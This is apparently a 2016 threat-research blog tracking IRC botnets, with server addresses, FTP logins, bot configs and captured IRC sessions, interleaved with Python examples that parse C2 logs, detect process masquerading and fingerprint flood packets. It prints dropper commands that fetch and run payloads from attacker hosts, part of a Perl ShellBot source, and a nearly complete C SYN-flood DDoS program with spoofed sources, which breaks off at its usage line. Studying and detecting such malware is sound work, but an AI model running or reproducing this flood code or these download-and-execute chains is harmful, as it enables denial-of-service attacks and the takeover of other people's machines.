
Saturday, December 10, 2016

IRC - drona.bot.nu - Botnet



Spreading FTP server:
ft*://kobra:kobra@195.234.176.57/

Bot config ////////pbot.php////////
class pBot
{
    var $config = array("server" => "112.124.47.140", "port" => "2222", "pass" => "",
        "prefix" => "NOU", "maxrand" => "6", "chan" => "#pma", "chan2" => "#pma2",
        "key" => "NEW", "modes" => "+pwisx", "password" => "123", "trigger" => ".",
        "hostauth" => "ANONYMOUS.XYZ", "limit" => "300"
        );
    // rest of the class not included in the dump
}
/////////end//////////
 


Also, at this point there is no DNS name yet (to avoid the domain getting suspended), but as soon as a newly infected machine joins the IRC, an automatic message from user "w" (an mIRC script) commands the bot to download the new bot file:


Here is the message from "w":

[20:59] <w> .user ro
[20:59] <w> .uname
[20:59] <w> .exec killall -9 perl
[20:59] <w> .exec cd /tmp/;wget ***://user:ggallery@66.71.191.82/a.pdf ; curl -O f*p://user:ggallery@66.71.191.82/a.pdf ; fetch f*p://user:ggallery@66.71.191.82/a.pdf ; lwp-download ftp://user:ggallery@66.71.191.82/a.pdf ; perl a.pdf ; rm -rf a.*
[20:59] <w> .exec cd /dev/shm/;wget ***://user:ggallery@66.71.191.82/drn.tgz;tar xvf drn.tgz;rm -rf drn.tgz;cd .p;./autorun;./run;
[20:59] <w> .download *****/lewl.ucoz.site/sexy.exe D:\sexy.exe
[20:59] <w> .exec start sexy.exe
[20:59] <w> .download ****//lewl.ucoz.site/sexy.exe C:\sexy.exe
[20:59] <w> .exec start D:\sexy.exe
[20:59] <w> .exec start C:\sexy.exe
[20:59] <w> .exec del sexy.exe C:\sexy.exe
[20:59] <w> .exec rm -rf sexy.exe C:\sexy.exe perl*
[20:59] <w> .exec cd /dev/shm ;wget f***://user:ggallery@66.71.191.82/drn.tgz;tar xvf drn.tgz;rm -rf drn.tgz;cd .p;./run;
[20:59] <w> .start D:\sexy.exe
[20:59] <w> .start C:\sexy.exe
[20:59] <w> .die
 


Also let's check the FTP: 3 files
  • a.pdf // new bot with the DNS
  • drn.tgz // Linux backdoor and IRC bot
  • gscan.tgz // his personal ZeMu setup

And in a.pdf we see his real DNS, and one photo below too




// Don't download if you don't know what you are doing .... drn.tgz : Sample
And sexy.exe is an mIRC-based IRC bot, packed as an SFX archive.
Some files:


And some other things found on his FTP. Ah yeah, he forgot to give limited access to that FTP user, or was just dumb enough to use the anonymous user ... anyway, all his shit rm -f *. If someone is interested in this shit, just email me:

 

Monday, November 28, 2016

ragebot - scan1.zapto.org - t0nixx [SKID]


>> NICK raGe|cjxtdsvUOE
>> USER mnquru "fo1.net" "rage" :mnquru
<< NOTICE AUTH :*** eh...
<< 001 raGe|cjxtdsvUOE
<< 002 raGe|cjxtdsvUOE
<< 003 raGe|cjxtdsvUOE
<< 004 raGe|cjxtdsvUOE
<< 005 raGe|cjxtdsvUOE
<< 005 raGe|cjxtdsvUOE
<< 005 raGe|cjxtdsvUOE
<< 422 raGe|cjxtdsvUOE :MOTD File is missing
<< MODE raGe|cjxtdsvUOE :+iwG
<< JOIN :#!b!#
>> JOIN #vnc #vnc
<< JOIN :#vnc
<< 332 raGe|cjxtdsvUOE #vnc :.xpl 94 1 23.26.x.x 3 1 23.26.x.x 3 1 / .scan 94 1 23.26.x.x 3 1 23.26.255.255 3 1
<< 333 raGe|cjxtdsvUOE #vnc akanz 1480289648
>> PRIVMSG #vnc :\x0314,1.:[\x0315,1rAGEBoT\x0314,1]:.\x0315,1 range: 23.26.x.x with 94 threads. (autorooting)
>> PING :NhG.server
>> PONG NhG.server
>> JOIN #vnc #vnc
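Both captures show the same thing operationally: the orders live in the channel, not in the binary. In the pBot post above, "w" pushes the whole dropper chain through `.exec` as soon as the bot joins; here the ragebot gets its standing scan order from the #vnc topic delivered in numeric 332. Pulling indicators out of such a capture is the first triage step. The following is an added example, not code from either post or from either bot: the log it parses is a constructed copy of a few lines from the two captures above, and the regexes, including how they treat the blog's defanged schemes (`ft*://`, `***://`, `*****/`), are my own assumptions about the formats.

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed sample: a few lines copied from the two captures above (the mIRC
# script "w" driving the pBot, and the ragebot's #vnc topic from numeric 332).
# Schemes are defanged the way the blog shows them.
SAMPLE_LOG = r"""
[20:59] <w> .exec killall -9 perl
[20:59] <w> .exec cd /tmp/;wget ***://user:ggallery@66.71.191.82/a.pdf ; curl -O f*p://user:ggallery@66.71.191.82/a.pdf ; perl a.pdf ; rm -rf a.*
[20:59] <w> .download *****/lewl.ucoz.site/sexy.exe D:\sexy.exe
[20:59] <w> .die
<< 332 raGe|cjxtdsvUOE #vnc :.xpl 94 1 23.26.x.x 3 1 23.26.x.x 3 1 / .scan 94 1 23.26.x.x 3 1 23.26.255.255 3 1
"""

# "[hh:mm] <nick> .cmd args": the trigger is "." in both bot configs.
PRIVMSG_RE = re.compile(r"^\[\d\d:\d\d\] <(?P<nick>[^>]+)> (?P<cmd>\.\S+)\s*(?P<args>.*)$")
# Numeric 332 carries the channel topic; ragebot runs it as a standing order on join.
TOPIC_RE = re.compile(r"^<< 332 \S+ (?P<chan>#\S+) :(?P<topic>.*)$")
# Real or defanged scheme (ftp://, f*p://, ***://, *****/), optional user:pass@, then host.
URL_RE = re.compile(
    r"(?:[a-z*]{2,6}://|\*+/+)(?:(?P<user>[^:/@\s]+):(?P<pw>[^@\s]+)@)?(?P<host>[A-Za-z0-9.\-]+)"
)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

DOWNLOADERS = ("wget", "curl", "fetch", "lwp-download")
INTERPRETERS = ("perl", "sh", "bash", "python", "php")


def _collect(text: str, hosts: Set[str], creds: Set[Tuple[str, str]]) -> None:
    """Harvest hosts and embedded credentials from one command or topic string."""
    for m in URL_RE.finditer(text):
        hosts.add(m["host"])
        if m["user"]:
            creds.add((m["user"], m["pw"]))
    hosts.update(IPV4_RE.findall(text))


def exec_steps(args: str) -> List[str]:
    """Split a '.exec' argument string into its individual shell commands."""
    return [s.strip() for s in args.split(";") if s.strip()]


def classify_step(step: str) -> str:
    """Rough stage of a dropper chain: download, execute, cleanup or other."""
    tok = step.split()[0] if step.split() else ""
    if tok in DOWNLOADERS:
        return "download"
    if tok in INTERPRETERS or tok.startswith("./"):
        return "execute"
    if tok in ("rm", "del", "killall"):
        return "cleanup"
    return "other"


def parse_c2_log(text: str) -> Dict[str, object]:
    """Extract bot commands, topic orders, hosts and credentials from a capture."""
    commands: List[Dict[str, str]] = []
    topic_orders: List[str] = []
    hosts: Set[str] = set()
    creds: Set[Tuple[str, str]] = set()
    for line in text.splitlines():
        line = line.strip()
        m = PRIVMSG_RE.match(line)
        if m:
            commands.append({"nick": m["nick"], "cmd": m["cmd"], "args": m["args"]})
            _collect(m["args"], hosts, creds)
            continue
        t = TOPIC_RE.match(line)
        if t:
            # several orders are separated by " / " inside the topic
            topic_orders.extend(o.strip() for o in t["topic"].split(" / "))
            _collect(t["topic"], hosts, creds)
    return {"commands": commands, "topic_orders": topic_orders,
            "hosts": sorted(hosts), "creds": sorted(creds)}


if __name__ == "__main__":
    result = parse_c2_log(SAMPLE_LOG)
    for c in result["commands"]:
        if c["cmd"] == ".exec":
            for step in exec_steps(c["args"]):
                print(f"{classify_step(step):9} {step}")
    print("topic orders:", result["topic_orders"])
    print("hosts:", result["hosts"], "creds:", result["creds"])
```

The credentials are worth keeping separately from the hosts: both posts show the same FTP login reused for spreading and for hosting, which is how the author got into the server in the first place. On a real capture, feed the function the raw IRC log rather than a cleaned copy; the PRIVMSG pattern assumes the `[hh:mm] <nick>` timestamp format the blog's client produced.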

Saturday, November 19, 2016

5k - Perl/ShellBot.B ddos - IRC

# TeaMrx Perlbot vS xeQT


my @mast3rs = ("Low","Loww");


my @admchan=("#Perli");

$servidor='188.119.151.131' unless $servidor;  # his server


my $xeqt = "!x";
my $homedir = "/tmp";
my $shellaccess = 1;
my $xstats = 1;
my $pacotes = 1;
my $linas_max = 5;
my $sleep = 6;
my $portime = 4;

my @fakeps = ("/usr/local/apache/bin/httpd -DSSL",
    "/usr/sbin/httpd -k start -DSSL",
    "/usr/sbin/httpd",
    "spamd child",
    "httpd");

my @nickname = ("TeaMrx","......","xQt");

my @xident = ("noway",......yn","ju");

my @xname = ("Googurl (C) 2006 xeQt","........","Team Work","jet lie");

#################
# Random Ports
#################
my @rports = ("6667");

my @Mrx = ("\001mIRC32 v5.91 K.Mardam-Bey\001","\001mIRC v6.2 Khaled Mardam-Bey\001",
    "\001mIRC v6.03 Khaled Mardam-Bey\001","\001mIRC v6.14 Khaled Mardam-Bey\001",
    "\001mIRC v6.15 Khaled Mardam-Bey\001","\001mIRC v6.16 Khaled Mardam-Bey\001",
    "\001mIRC v6.17 Khaled Mardam-Bey\001","\001mIRC v6.21 Khaled Mardam-Bey\001",
    "\001Snak for Macintosh 4.9.8 English\001",
    "\001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC\001",
    "\001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)\001",
    "\001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]\001",
    "\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]\001",
    "\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]\001",
    "\001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]\001",
    "\001ircN 7.27 + 7.0 - -\001","\001..(argon/1g) :bitchx-1.0c17\001",
    "\001ircN 8.00  -  he tries to tell me what I put inside of me  - \001",
    "\001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people\001",
    "\001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!\001",
    "\001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!\001",
    "\001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!\001",
    "\001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!\001",
    "\001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!\001",
    "\001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!\001",
    "\001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!\001",
    "\001bitchx-1.0c18 :tunnelvision/1.2\001","\001PnP 4.22 - http://www.pairc.com/\001",
    "\001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1á9] : Keep it to yourself!\001",
    "\001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras\001",
    "\001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet\001",
    "\001irssi v0.8.10 - running on Linux i586\001","\001irssi v0.8.10 - running on FreeBSD i386\001",
    "\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.6mods v1.0 by acidflash - Almost there\001",
    "\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.8+OperMods v1.0 by acidflash - Almost there\001");

# Default quick scan ports
my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");

# xeQt

#my $nick = "sshb0t1";
my $nick = $nickname[rand scalar @nickname];
my $realname = $xname[rand scalar @xname];
my $ircname = $xident[rand scalar @xident];
my $porta = $rports[rand scalar @rports];
my $xproc = $fakeps[rand scalar @fakeps];
my $Mrx = $Mrx[rand scalar @Mrx];
my $version = 'vSm0d (C) TeaMrx';

$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';

use IO::Socket;
use Socket;
use IO::Select;
chdir("$homedir");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$xproc"."\0";
my $pid=fork;
exit if $pid;
die "[x] -> Cannot fork into background: $!" unless defined($pid);
my %irc_servers;
my %DCC;
my $dcc_sel = new IO::Select->new();

sub getnick {
  return "$nickname[rand scalar @nickname]".int(rand(1000));
}

Needed to delete some shit because the site gets blacklisted

  }
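The bot hides from ps by rewriting `$0` to one of the `@fakeps` strings and forking into the background. That only changes the argv area; the kernel's own view of the process, `/proc/<pid>/comm` and the `/proc/<pid>/exe` link, still says perl. The check below is an added example of my own, not code from the post or from the bot: it compares the claimed argv[0] against exe and comm, and also treats a process running from a binary that was unlinked after start (the `./run` from `/dev/shm/.p` in the dropper chain above) as suspect. The process list it runs on by default is constructed; `snapshot_procfs()` reads a live Linux /proc. The default allowlist is an assumption about the host: SpamAssassin's spamd children really are perl and really rename themselves "spamd child", which is exactly why the bot picked that name.

```python
import os
from dataclasses import dataclass
from typing import FrozenSet, Iterable, List, Optional, Tuple

# Interpreters this family of IRC bots is written in; a process whose exe or
# comm is one of these but whose argv[0] claims something else is suspect.
INTERPRETERS = ("perl", "python", "php", "ruby")


@dataclass
class Proc:
    pid: int
    cmdline: str  # /proc/<pid>/cmdline with NULs as spaces; attacker-controlled via $0
    comm: str     # /proc/<pid>/comm: set by the kernel at execve, not touched by $0
    exe: str      # readlink(/proc/<pid>/exe); ends with " (deleted)" if the file is gone


def claimed_name(p: Proc) -> str:
    """What ps/top show as the program name: basename of argv[0]."""
    parts = p.cmdline.split()
    return os.path.basename(parts[0]) if parts else ""


def looks_masqueraded(p: Proc) -> Optional[str]:
    """Reason string if the claimed name disagrees with the kernel's view, else None."""
    claimed = claimed_name(p)
    if p.exe.endswith(" (deleted)"):
        return f"pid {p.pid}: running from an unlinked binary ({p.exe})"
    real_names = (os.path.basename(p.exe), p.comm)
    for interp in INTERPRETERS:
        if any(n.startswith(interp) for n in real_names) and interp not in claimed:
            return f"pid {p.pid}: exe/comm say {interp} but argv[0] claims {claimed!r}"
    return None


def find_masqueraders(procs: Iterable[Proc],
                      allow: FrozenSet[str] = frozenset({"spamd"})) -> List[Tuple[int, str]]:
    """Return (pid, reason) for every suspect process not covered by the allowlist."""
    hits: List[Tuple[int, str]] = []
    for p in procs:
        if claimed_name(p) in allow:
            continue  # known legitimate renamers (spamd is perl and calls itself "spamd child")
        reason = looks_masqueraded(p)
        if reason:
            hits.append((p.pid, reason))
    return hits


def snapshot_procfs() -> List[Proc]:
    """Live view of a Linux /proc; needs root to read exe links of other users' processes."""
    procs: List[Proc] = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        pid = int(name)
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            continue  # kernel threads, or processes we are not allowed to inspect
        procs.append(Proc(pid, cmdline, comm, exe))
    return procs


# Constructed sample, modelled on what the bot above would look like next to real daemons.
SAMPLE = [
    Proc(1234, "/usr/sbin/httpd -k start -DSSL", "perl", "/usr/bin/perl"),  # ShellBot: $0 rewritten
    Proc(2001, "/usr/sbin/httpd -k start", "httpd", "/usr/sbin/httpd"),      # genuine apache
    Proc(2002, "spamd child", "perl", "/usr/bin/perl"),                      # spamd: perl, allowlisted
    Proc(3003, "./run", "run", "/dev/shm/.p/run (deleted)"),                 # dropper binary unlinked
]

if __name__ == "__main__":
    for pid, reason in find_masqueraders(SAMPLE):
        print(reason)
```

The bot's `$SIG{...} = 'IGNORE'` lines do not affect this check, but they are a second tell: a "httpd" whose SigIgn mask in `/proc/<pid>/status` covers INT, HUP and TERM is not apache either.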

Ah, found this in his spreading FTP, maybe interesting to someone ....


/* "DOMINATE" Attack Script, this script was so difficult to make, it required taking the very public ESSYN
attack script, and replacing "tcph->res2 = 1;" to "tcph->res2 = 3;" in the "setup_tcp_header" function.
Anybody who purchased this script for $300 BTC, yup, it's literally changing a 1 to a 3.
*/
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <pthread.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <netdb.h>
#include <net/if.h>
#include <arpa/inet.h>

#define MAX_PACKET_SIZE 4096
#define PHI 0x9e3779b9

static unsigned long int Q[4096], c = 362436;
static unsigned int floodport;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;

void init_rand(unsigned long int x)
{
 int i;
 Q[0] = x;
 Q[1] = x + PHI;
 Q[2] = x + PHI + PHI;
 for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
}
unsigned long int rand_cmwc(void)
{
 unsigned long long int t, a = 18782LL;
 static unsigned long int i = 4095;
 unsigned long int x, r = 0xfffffffe;
 i = (i + 1) & 4095;
 t = a * Q[i] + c;
 c = (t >> 32);
 x = t + c;
 if (x < c) {
  x++;
  c++;
 }
 return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int count)
{
 register unsigned long sum = 0;
 while( count > 1 ) { sum += *buf++; count -= 2; }
 if(count > 0) { sum += *(unsigned char *)buf; }
 while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
 return (unsigned short)(~sum);
}

unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {

 struct tcp_pseudo
 {
  unsigned long src_addr;
  unsigned long dst_addr;
  unsigned char zero;
  unsigned char proto;
  unsigned short length;
 } pseudohead;
 unsigned short total_len = iph->tot_len;
 pseudohead.src_addr=iph->saddr;
 pseudohead.dst_addr=iph->daddr;
 pseudohead.zero=0;
 pseudohead.proto=IPPROTO_TCP;
 pseudohead.length=htons(sizeof(struct tcphdr));
 int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
 unsigned short *tcp = malloc(totaltcp_len);
 memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
 memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
 unsigned short output = csum(tcp,totaltcp_len);
 free(tcp);
 return output;
}

void setup_ip_header(struct iphdr *iph)
{
 iph->ihl = 5;
 iph->version = 4;
 iph->tos = 0;
 iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
 iph->id = htonl(54321);
 iph->frag_off = 0;
 iph->ttl = MAXTTL;
 iph->protocol = 6;
 iph->check = 0;
 iph->saddr = inet_addr("192.168.3.100");
}

void setup_tcp_header(struct tcphdr *tcph)
{
 tcph->source = htons(5678);
 tcph->seq = rand();
 tcph->ack_seq = 0;
 tcph->res2 = 3;
 tcph->doff = 5;
 tcph->syn = 1;
 tcph->window = htonl(65535);
 tcph->check = 0;
 tcph->urg_ptr = 0;
}

void *flood(void *par1)
{
 char *td = (char *)par1;
 char datagram[MAX_PACKET_SIZE];
 struct iphdr *iph = (struct iphdr *)datagram;
 struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
 
 struct sockaddr_in sin;
 sin.sin_family = AF_INET;
 sin.sin_port = htons(floodport);
 sin.sin_addr.s_addr = inet_addr(td);

 int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
 if(s < 0){
  fprintf(stderr, "Could not open raw socket.\n");
  exit(-1);
 }
 memset(datagram, 0, MAX_PACKET_SIZE);
 setup_ip_header(iph);
 setup_tcp_header(tcph);

 tcph->dest = htons(floodport);

 iph->daddr = sin.sin_addr.s_addr;
 iph->check = csum ((unsigned short *) datagram, iph->tot_len);

 int tmp = 1;
 const int *val = &tmp;
 if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
  fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
  exit(-1);
 }

 init_rand(time(NULL));
 register unsigned int i;
 i = 0;
 while(1){
  sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));

  iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
  iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
  iph->check = csum ((unsigned short *) datagram, iph->tot_len);
  tcph->seq = rand_cmwc() & 0xFFFF;
  tcph->source = htons(rand_cmwc() & 0xFFFF);
  tcph->check = 0;
  tcph->check = tcpcsum(iph, tcph);
  
  pps++;
  if(i >= limiter)
  {
   i = 0;
   usleep(sleeptime);
  }
  i++;
 }
}
int main(int argc, char *argv[ ])
{
 if(argc < 6){
  fprintf(stderr, "Invalid parameters!\n");
  fprintf(stdout, "Usage: %s     
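Reading setup_tcp_header() and flood() above as they behave on the little-endian hosts this gets compiled on gives a per-packet signature that is more useful than the res2 trick itself. res2 is the pair of bits that RFC 3168 later named ECE and CWR, so res2 = 3 simply produces an ECN-setup SYN, which every ECN-capable client also sends; keying a filter on that alone would block legitimate traffic. What is distinctive is the rest: tcph->window = htonl(65535) truncates to 0 in the 16-bit field, tcph->seq = rand_cmwc() & 0xFFFF is stored without htonl so the low 16 bits of the on-wire sequence number are always zero, doff = 5 means no options, and ttl = MAXTTL is 255. The code below is an added example, not part of the post or of the flood: it builds such a packet from constructed addresses (with correct checksums; the kernel rewrites tot_len and the IP checksum under IP_HDRINCL anyway) and then decodes raw bytes to test for those indicators together.

```python
import socket
import struct
from typing import Dict

FIN, SYN, RST, PSH, ACK, URG, ECE, CWR = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum; same arithmetic as csum() in the flood source."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_tcp(src: str, dst: str, sport: int, dport: int, seq: int,
                   flags: int, window: int, ttl: int, ip_id: int) -> bytes:
    """IPv4 header + 20-byte TCP header, no payload, both checksums valid."""
    s, d = socket.inet_aton(src), socket.inet_aton(dst)
    tcp = struct.pack("!HHIIHHHH", sport, dport, seq, 0, (5 << 12) | flags, window, 0, 0)
    pseudo = struct.pack("!4s4sBBH", s, d, 0, socket.IPPROTO_TCP, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", inet_checksum(pseudo + tcp)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), ip_id, 0, ttl,
                     socket.IPPROTO_TCP, 0, s, d)
    ip = ip[:10] + struct.pack("!H", inet_checksum(ip)) + ip[12:]
    return ip + tcp


def dominate_syn(src: str, dst: str, dport: int, sport: int, seq16: int, ip_id: int) -> bytes:
    """Constructed reproduction of one packet from the flood loop above on a
    little-endian host (assumed): ECE+CWR from res2 = 3, window 0 from the
    truncated htonl(65535), a 16-bit seq stored in host order, TTL 255."""
    seq_wire = ((seq16 & 0xFF) << 24) | (((seq16 >> 8) & 0xFF) << 16)
    return build_ipv4_tcp(src, dst, sport, dport, seq_wire, SYN | ECE | CWR, 0, 255, ip_id)


def fingerprint(pkt: bytes) -> Dict[str, object]:
    """Decode an IPv4/TCP packet and report the indicators discussed above."""
    ihl = (pkt[0] & 0x0F) * 4
    ttl, proto = pkt[8], pkt[9]
    tcp = pkt[ihl:]
    sport, dport, seq, _ack, off_flags, window, _csum, _urg = struct.unpack("!HHIIHHHH", tcp[:20])
    flags = off_flags & 0x1FF
    pseudo = struct.pack("!4s4sBBH", pkt[12:16], pkt[16:20], 0, proto, len(tcp))
    return {
        "src": socket.inet_ntoa(pkt[12:16]), "dst": socket.inet_ntoa(pkt[16:20]),
        "sport": sport, "dport": dport, "ttl": ttl, "seq": seq, "window": window,
        "syn_only": (flags & 0x3F) == SYN,                      # SYN without ACK/RST/FIN/PSH/URG
        "ecn_setup": (flags & (ECE | CWR)) == (ECE | CWR),      # res2 = 3, legitimate for ECN clients
        "no_options": (off_flags >> 12) * 4 == 20,              # doff = 5
        "seq_low16_zero": (seq & 0xFFFF) == 0,                  # seq stored without htonl
        "tcp_checksum_ok": inet_checksum(pseudo + tcp) == 0,    # valid checksum sums to zero
    }


def matches_dominate(pkt: bytes) -> bool:
    """All indicators together; any one of them alone is not a verdict."""
    fp = fingerprint(pkt)
    return bool(fp["syn_only"] and fp["ecn_setup"] and fp["no_options"]
                and fp["window"] == 0 and fp["seq_low16_zero"] and fp["ttl"] > 128)


if __name__ == "__main__":
    pkt = dominate_syn("203.0.113.7", "192.0.2.10", 80, 40000, 0x1234, 1)
    print(fingerprint(pkt), matches_dominate(pkt))
```

Because the loop overwrites iph->saddr with a fresh random value every packet, the source address is useless for filtering and the indicators have to be evaluated per packet; a window of zero on a SYN together with a sequence number whose low half is always zero is the pair to look for, the TTL threshold only adds confidence since a Linux origin normally starts at 64. The original's TCP checksum is a further tell on 64-bit builds, where the pseudo header's unsigned long addresses make tcpcsum() sum the wrong bytes, but the example above does not rely on it.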


Sunday, November 13, 2016

pBot Skidd - 93.158.200.94 - IRC




// users 
9/tcp  open  irc     Unreal ircd
| irc-info: 
|   server: irc.MoneyZ.gov.GoV
|   version: Unreal3.2.10.2. irc.MoneyZ.gov.GoV 
|   servers: 1
|   chans: 2
|   users: 246
|   lservers: 0
|   lusers: 246

// config
class pBot
{
    var $config = array("server"=>"93.158.200.94", "port"=>"9", "key"=>"", "prefix"=>"botID", "maxrand"=>"8",
        "chan"=>"#-|Bots", "trigger"=>"", "password"=>"", "auth"=>"MoneyZ.gov");
    var $users = array();
    function start() {
        while(true)
        {
            // rest of the main loop not included in the dump
        }
    }
}

Saturday, November 12, 2016

Bot - l.lolole.net - IRC

DNS : l.lolole.net


<< NOTICE AUTH :*** Looking up your hostname...
<< NOTICE AUTH :*** Found your hostname
>> USER dk dk dk dk
>> NICK dkacoxfdb
<< 001 dkacoxfdb
<< 002 dkacoxfdb :               M0dded by uNkn0wn Crew
<< 003 dkacoxfdb
<< 004 dkacoxfdb :          www.uNkn0wn.eu - iD@uNkn0wn.eu
<< 005 dkacoxfdb
<< 005 dkacoxfdb
<< 005 dkacoxfdb
<< 422 dkacoxfdb :MOTD File is missing
<< MODE dkacoxfdb :+iwG
>> JOIN #k
<< JOIN :#k
>> PING :E.tk
>> PONG :E.tk



test https://malwr.com/analysis/YThlNzM5N2JlNjU1NGIwNjg0ZWY3Y2YwYzgwNTcxYWI/share/e34eba54ecbb465a9c40c221949ac034